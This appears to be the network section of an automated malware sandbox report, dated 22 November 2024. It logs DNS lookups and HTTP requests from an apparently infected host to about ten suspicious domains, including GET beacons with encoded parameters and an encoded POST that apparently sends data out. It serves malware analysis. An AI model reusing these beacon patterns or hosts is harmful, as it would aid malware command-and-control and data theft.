                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 13:46:22 GMTserver: Apacheset-cookie: __tad=1732283182.2614315; expires=Mon, 20-Nov-2034 13:46:22 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 13:46:24 GMTserver: Apacheset-cookie: __tad=1732283184.1678705; expires=Mon, 20-Nov-2034 13:46:24 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 13:46:27 GMTserver: Apacheset-cookie: __tad=1732283187.3556796; expires=Mon, 20-Nov-2034 13:46:27 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 34 99 64 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b d3 a7 38 bf 4c 1c fa 5d 4b e1 fc 1e c2 7e 2c ec 82 ce 60 27 b9 3c 23 b2 bd f6 a1 d8 e7 6a 39 c0 54 8b f2 d1 52 fa ec 6e 7a 3e fd bf 76 85 32 03 21 e8 3e 01 63 55 93 a2 73 43 c7 ff fe 0e 43 57 5f 8e 1c 1d 79 8a 61 65 2b 6e 34 04 ec da d9 9d a9 16 17 d7 b3 6b 35 7f 07 27 60 f4 00 62 da 78 19 06 f4 6a ad 6c 6b 9d 88 2f ea 61 c5 10 26 96 b7 b3 61 f1 bc 16 95 de c3 c0 15 49 a5 3d ab 3f 2e c0 58 83 cb a4 2c 24 34 0e 6b f1 cf f9 0d 93 30 4f ca 8f ad 56 5b 68 d0 e1 30 a8 86 d0 15 b9 e4 8b c3 f9 b9 8a b1 a3 9b a2 43 e2 b4 9c f0 0a 7f ed f4 5e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 6c 09 3f 6e be 8a d7 aa be 0d f7 f2 29 31 3b 0f 96 87 0e 84 bf c2 03 08 12 dd 79 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y
                Source: global trafficHTTP traffic detected: GET /hv6g/?NjHpTfh=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP8KkEC54eipAN6+u9bqO0oPPtGBbKuyofNdvdufJOx9cYQ==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.huiguang.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /79tr/?NjHpTfh=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8CAmIyANUKvAf3+5N6bOzfwLz/Gtq1ZNC0AtH/TFhPdx4Q==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hxmz/?NjHpTfh=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70ewIeMOmwh+ftSU1XmKvTSoNxNN/QLOdtg9qtYWOUm1ByQ==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.futurevision.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /slxp/?NjHpTfh=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOs9wYs5314wmawIeBCSIctWMwFCyIHUycaencn4NBaeE5ag==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.schedulemassage.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mcfunding.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.migorengya8.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.klohk.techConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.d63dm.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.servannto.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.huiguang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.beingandbecoming.ltd
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.schedulemassage.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mcfunding.org
                Source: global trafficDNS traffic detected: DNS query: www.migorengya8.click
                Source: global trafficDNS traffic detected: DNS query: www.klohk.tech
                Source: global trafficDNS traffic detected: DNS query: www.d63dm.top
                Source: global trafficDNS traffic detected: DNS query: www.servannto.site
                Source: global trafficDNS traffic detected: DNS query: www.telforce.one
                Source: unknownHTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 4e 6a 48 70 54 66 68 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 6f 7a 6c 61 4b 53 74 6c 59 6e 34 2b 68 78 36 30 64 79 6a 49 37 52 43 6b 71 33 4d 55 67 51 6e 6a 48 33 43 42 44 73 3d Data Ascii: NjHpTfh=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWozlaKStlYn4+hx60dyjI7RCkq3MUgQnjH3CBDs=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 13:45:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 13:45:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 13:45:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Nov 2024 13:45:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument 